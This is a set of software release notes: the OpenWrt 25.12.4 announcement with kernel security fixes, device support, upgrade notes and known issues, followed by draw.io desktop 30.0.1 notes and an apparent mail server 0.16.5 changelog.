• Linux kernel: CVE-2026-43284 ("Dirty Frag") — local privilege escalation via the IPsec ESP path. Only relevant on devices with kmod-ipsec / esp4/esp6 loaded. Fixed via the 6.12.87 kernel update.

Device support

New devices supported in 25.12.4:

• ath79: MikroTik RouterBOARD 960PGS (hEX PoE / PowerBox Pro)
• mediatek: filogic: Cudy WR3000E v1: add ubootmod variant
• mediatek: filogic: Cudy WR3000H v1: add ubootmod variant
• mediatek: filogic: Cudy WR3000P v1: add ubootmod variant
• mediatek: filogic: Cudy WR3000S v1: add ubootmod variant

Device fixes:

• ath79: Sitecom WLR-7100 (X7 AC1200): fix MAC address assignment, wire up 5 GHz WLAN LED, and move to the tiny target to free ~800 KiB of flash
• ipq40xx: Pakedge WR-1: restore lost band label on the WLAN LEDs
• mediatek: filogic: Cudy WR3000E/H/P/S v1 and WBR3000UAX v1 (ubootmod NAND builds): disable NMBM, which was mistakenly enabled and prevented the NAND from being used correctly
• microchipsw: fix LAN8814 QSGMII soft reset

WiFi fixes and improvements

• wifi-scripts: fix basic_rate mapping in the wpa_supplicant ucode generator
• mac80211: update backports package to 6.18.26 (general stability improvements)

Core component updates

• Linux kernel: update from 6.12.85 to 6.12.87
• mac80211: update from 6.18.7 to 6.18.26

Upgrading to 25.12.4

Upgrading from 24.10 to 25.12 should be transparent on most devices, as most configuration data has either remained the same or will be translated correctly on first boot by the package init scripts.
For upgrades within the OpenWrt 25.12 stable series, Attended Sysupgrade is also supported, which allows preserving the installed packages.

• Sysupgrade from 23.05 or earlier to 25.12 is not officially supported.

• Cron log level was fixed in busybox. system.@system[0].cronloglevel should be set to 7 for normal logging. 7 is the default now. If this option is not set, the default is used and no manual action is needed. fc0c518

• Bananapi BPI-R4: Interface eth1 was renamed to sfp-lan or lan4, and interface eth2 was renamed to sfp-wan to match the labels. You have to upgrade without saving the configuration. cd8dcfe

• TP-Link RE355 v1, RE450 v1 and RE450 v2: The partition layout and block size changed in this release to fix configuration loss on sysupgrade. Users upgrading from OpenWrt 25.12.0 or earlier must use sysupgrade -F to force the upgrade. The image must not exceed 5.875 MB (6016 KiB).

• Meraki MX60: Direct sysupgrade to 25.12.4 is not possible without manual preparation — meraki_loadaddr must be changed before upgrading, as the default value is insufficient to boot OpenWrt 25.12+. See the device wiki page for instructions.

Known issues

• Zyxel EX5601-T0: the WAN interface was renamed from eth1 to wan — check and update your network configuration after upgrading.
• Pixel 10 phones have problems connecting to WPA3-protected WiFi 6 APs. #21486
• 802.11r Fast Transition (FT) causes connection problems with some WiFi clients when WPA3 is used. #22200
• SQM CAKE MQ (cake_mq): throughput may be unexpectedly low on some configurations after the scheduler fixes in this release. #22344

Full release notes and upgrade instructions are available at
https://openwrt.org/releases/25.12/notes-25.12.4

In particular, make sure to read the known issues before upgrading:
https://openwrt.org/releases/25.12/notes-25.12.4#known_issues

For a detailed list of all changes, refer to
https://openwrt.org/releases/25.12/changelog-25.12.4

To download the 25.12.4 images, navigate to:
https://downloads.openwrt.org/releases/25.12.4/targets/
Use OpenWrt Firmware Selector to download:
https://firmware-selector.openwrt.org?version=25.12.4

As always, a big thank you goes to all our active package maintainers, testers, documenters and supporters.

Have fun!

The OpenWrt Community

To stay informed of new OpenWrt releases and security advisories, there
are new channels available:

• a low-volume mailing list for important announcements:
  https://lists.openwrt.org/mailman/listinfo/openwrt-announce

• a dedicated "announcements" section in the forum:
  https://forum.openwrt.org/c/announcements/14

• other announcement channels (such as RSS feeds) might be added in the
  future, they will be listed at https://openwrt.org/contact

Releases Notes for 30.0.1

Windows Installer
Windows No Installer (zip)
macOS - Universal
Linux - deb, AppImage or rpm

Windows intel x32 releases are marked -ia32-

ChangeLog:

• Uses electron 42.0.1
• #2422 , #2425
• Updates to draw.io core 30.0.1.

[0.16.5] - 2026-05-11

If you are upgrading from v0.16.x, replace the binary (or run docker pull). If you are upgrading from v0.15.x and below, please read the upgrading documentation for more information on how to upgrade from previous versions.

Added

• is_ip_in_cidr expression function for CIDR matching.

Changed

• Bump mail-auth to 0.9 (which bumps hickory-resolver to 0.26).
• Deprecated RFC2136 SIG(0) support as it is no longer supported by hickory.

Fixed

• JMAP:
  • Patching ids containing digits in JSON Pointers fails.
  • Patching nested objects with null values fails.
• External directories:
  • SQL: Return Failed instead of Error when the query returns no results.
  • LDAP: Impersonation fails when the user has not logged in before.
• Network: Attempt binding to IPv4 when binding to IPv6 fails with EAFNOSUPPORT error.
• Bootstrap: Timeout after 30 seconds when probing the data store.
• HTTP: Use permissive CORS headers for .well-known endpoints.
• ACME:
  • Include apex domains when requesting certificates for subdomains.
  • Use the public suffix list to determine the zone name when no origin is provided.
• MTA:
  • Allow rescheduling recipients with permanent failures.
  • Process reports using original RCPT before rewriting.
• Autodiscover v2 endpoint unreachable.
• DNS update (via dns-update crate):
  • OVH + Google Cloud DNS: Fix FQDN handling for MX and SRV records.
  • Route53: Fix changeset error resolution.
  • deSEC: Use empty subname for apex records instead of @, which the API rejects.
  • Cloudflare: Wrap TXT record content in double quotes (RFC 1035) to suppress dashboard warnings.
• iCalendar/JSCalendar (via calcard crate):
  • Support STATUS:CANCELLED mapping from VTODO to JSCalendar.
  • Fixed duration parsing for zero duration PT0S.

Check binary attestation here